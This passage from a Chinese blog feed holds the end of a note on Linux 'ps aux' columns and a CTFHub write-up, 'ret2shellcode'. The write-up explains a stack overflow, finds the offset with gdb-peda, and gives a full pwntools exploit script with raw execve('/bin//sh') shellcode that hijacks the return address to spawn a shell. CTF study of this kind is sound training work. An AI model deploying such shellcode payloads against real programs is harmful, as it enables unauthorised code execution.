%MEM:内存占用的百分比</p><p>VSZ:占用虚拟内存(swap空间)的大小 RSS:占用常驻内存(物理内存)的大小</p><p>TTY:该进程在哪个终端上运行。“?”表未知或不需要终端 STAT:显示了进程当前的状态,如S(休眠)、R(运行)、Z(僵死)、<(高优先级)、N(低优先级)、s(父进程)、+(前台进程)。对处于僵死状态的进程应予以手动终止。</p><p>START:启动该进程的时间 TIME:该进程占用CPU时间 COMMAND:启动该进程的命令的名称</p><p><strong>总结:ps aux 是以简单列表的形式显示出进程信息。</strong></p>]]></content>
<summary type="html"><p>本文转载于:<a href="https://cloud.tencent.com/developer/article/1711858">LINUX查看进程的4种方法(小结)</a></p>
<p>进程是在 CPU 及内存中运行的程序代码,而每个进程可以创建一个或多个进程(父</summary>
<category term="转载" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="系统进程" scheme="https://www.rgzzplus.com/tags/%E7%B3%BB%E7%BB%9F%E8%BF%9B%E7%A8%8B/"/>
</entry>
<entry>
<title>ret2shellcode</title>
<link href="https://www.rgzzplus.com/2022/09/05/ret2shellcode/"/>
<id>https://www.rgzzplus.com/2022/09/05/ret2shellcode/</id>
<published>2022-09-05T11:54:06.000Z</published>
<updated>2022-09-05T11:56:29.086Z</updated>
<content type="html"><![CDATA[<h1 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h1><blockquote><p><a href="https://www.ctfhub.com/#/skilltree">题目地址</a></p></blockquote><p>拿到题目,首先看看文件类型,以及保护机制。<br><img src="/2022/09/05/ret2shellcode/image-20220903235214002.png" alt="image-20220903235214002"></p><p>我们发现它缺少执行权限,加上权限后执行,是简单的输入输出,不过这里似乎给到我们了一个地址。</p><h1 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h1><p>接下来,把程序拖入 ida,反汇编看看:<br><img src="/2022/09/05/ret2shellcode/image-20220904000019546.png" alt="image-20220904000019546"></p><p>我们发现这个程序中并没有关于 flag 的相关信息,所以我们推测 flag 存放在服务器上。</p><p>还发现程序通过 read() 把输入存入buf[],也没有保护机制保护栈,这就给了我们栈溢出的机会。<br>还记得我们前面提到的那个输出的地址吗,从反汇编代码可以看出,它就是 buf 的地址。</p><h1 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h1><p>这样我们就有了溢出思路,通过输入字符串一直覆盖掉 rbp,制造栈溢出。<br>通过题目名称 ret2shellcode,也能知道最后一定要获得 shell 的。但我并未在程序中发现关于获得 sh 的代码,那就只能自己写了。</p><h1 id="0x4"><a class="markdownIt-Anchor" href="#0x4"></a> 0x4</h1><p>梳理一下我们<strong>需要获得的信息</strong>:</p><ul><li>buf[] 的地址</li><li>buf[] 与 rbp 的距离</li><li>shellcode</li></ul><p>( 1)buf[] 的地址,就在输出中,我们要想办法把它提取出来。<br><img src="/2022/09/05/ret2shellcode/image-20220904002822097.png" alt="image-20220904002822097"></p><blockquote><p><code>recvuntil</code>( <em>delims</em> , <em>drop=False</em> , <em>timeout=default</em> ) → 字节[<a href="https://github.com/Gallopsled/pwntools/blob/493a3e3d92/pwnlib/tubes/tube.py#L273-L361">资源]</a></p><p>接收数据,直到遇到delims之一。</p><p>如果在<code>timeout</code>几秒内没有满足请求,所有数据都会被缓冲并返回一个空字符串 ( <code>''</code>)。</p><ul><li><pre><code> 参数:</code></pre><strong>delims</strong> ( <a href="https://docs.python.org/3.8/library/stdtypes.html#bytes"><em>bytes</em></a> <em>,</em> <a href="https://docs.python.org/3.8/library/stdtypes.html#tuple"><em>tuple</em></a> ) — 分隔符的字节串,或分隔符字节串的列表。<br><strong>drop</strong> ( <a href="https://docs.python.org/3.8/library/functions.html#bool"><em>bool</em></a> ) – 删除结尾。如果<code>True</code>它从返回值的末尾移除。</li><li><pre><code> Raises: **exceptions.EOFError** — 连接在请求得到满足之前关闭 </code></pre></li><li><pre><code> 返回值: 包含从套接字接收到的字节的字符串,或者`''`如果在等待时发生超时。 </code></pre></li></ul><p>摘自:<a href="https://docs.pwntools.com/en/stable/tubes.html">pwntools</a></p></blockquote><p>( 2)距离</p><p>方法一:看汇编代码,buf[] 与 rbp 的距离:0x10 + 8 = 24<sub>10</sub><br><img src="/2022/09/05/ret2shellcode/image-20220904002551439.png" alt="image-20220904002551439"></p><p>方法二: peda 调试</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda pwn</span><br><span class="line">pattern create 200 //制造200个填充字符(多少字符都行),先把他复制下来</span><br><span class="line">r //运行程序</span><br><span class="line"></span><br><span class="line">pattern offset 地址 //ret 地址,确定偏移</span><br></pre></td></tr></table></figure><p><img src="/2022/09/05/ret2shellcode/image-20220904002120603.png" alt="image-20220904002120603"></p><p><img src="/2022/09/05/ret2shellcode/image-20220904002141581.png" alt="image-20220904002141581"></p><p><img src="/2022/09/05/ret2shellcode/image-20220904002212274.png" alt="image-20220904002212274"></p><p><img src="/2022/09/05/ret2shellcode/image-20220904002358262.png" alt="image-20220904002358262"></p><p>( 3) shellcode</p><ul><li>可以自己编写,<a href="https://www.rgzzplus.com/2022/08/05/Linux-shellcode%E5%BC%80%E5%8F%91%E5%85%A5%E9%97%A8/">shellcode 开发入门</a></li><li>使用 pwntools 生成,<a href="http://shellcraft.sh">shellcraft.sh</a>()</li></ul><h1 id="0x5"><a class="markdownIt-Anchor" href="#0x5"></a> 0x5</h1><p><strong>exp:</strong></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>* </span><br><span class="line"></span><br><span class="line">context(os=<span class="string">'linux'</span>, arch=<span class="string">'amd64'</span>, log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./pwn"</span>)</span><br><span class="line"><span class="comment"># p = connect('challenge-47138fa4ef483fb7.sandbox.ctfhub.com',33570)</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b'['</span>)</span><br><span class="line">buf_addr = p.recvuntil(<span class="string">b']'</span>, drop=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(buf_addr)</span><br><span class="line">shellcode = <span class="string">b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"</span></span><br><span class="line"><span class="comment">#shellcode = asm(shellcraft.sh())</span></span><br><span class="line">payload = <span class="string">b"a"</span>*<span class="number">24</span> + p64(<span class="built_in">int</span>(buf_addr,<span class="number">16</span>)+<span class="number">32</span>)+shellcode</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Input someting :"</span>,payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>最后远程连接获取 flag:ls 发现有一个flag文件,cat flag 即可</p>]]></content>
<summary type="html"><h1 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h1>
<blockquote>
<p><a href="https://www.ctfhub.com/#/skilltree">题目地址</a></p</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ret2shellcode" scheme="https://www.rgzzplus.com/tags/ret2shellcode/"/>
</entry>
</feed>